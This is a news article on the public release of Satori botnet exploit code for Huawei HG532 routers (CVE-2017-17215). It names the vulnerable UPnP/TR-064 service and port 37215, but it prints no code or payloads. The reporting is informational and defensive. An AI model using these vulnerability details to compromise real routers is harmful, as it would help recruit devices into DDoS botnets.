Researchers warn that now that it has been made public, the Satori malware code could be used in new botnets.
Code used in the Satori malware (a varient of the IoT malware Mirai) has been made public. Ankit Anubhav, principal researcher at IT firm NewSky Security, found the code available free of charge on Pastebin.com over Christmas.
In a blog post, he said this exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot. The malware has been used to attack thousands of IoT devices including Huawei routers.
According to security researchers, there is now a risk that the code will be used by criminals to recruit IoT devices into a botnet to carry out DDoS attacks.
He added that CVE-2017–17215, a vulnerability in Huawei HG532 devices, was discovered during a zero-day Satori attack by Checkpoint and was discreetly reported to Huawei for a fix.
“The proof of concept code was not made public to prevent attackers from abusing it. However, with the release of the full code now by the threat actor, we expect its usage in more cases by script kiddies and copy-paste botnet masters,” he said.
“An authenticated attacker could send malicious packets to port 37215 to launch attacks,” Huawei said in its security advisory. “Successful exploit could lead to the remote execution of arbitrary code.”
Check Point said that the vulnerability is connected to Huawei’s implementation of the Universal Plug and Play (UPnP) protocol via the TR-064 technical report standard. This flaw enabled remote attackers to inject arbitrary commands, which hackers used to create the Satori botnet.
“IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code,” said Anubhav.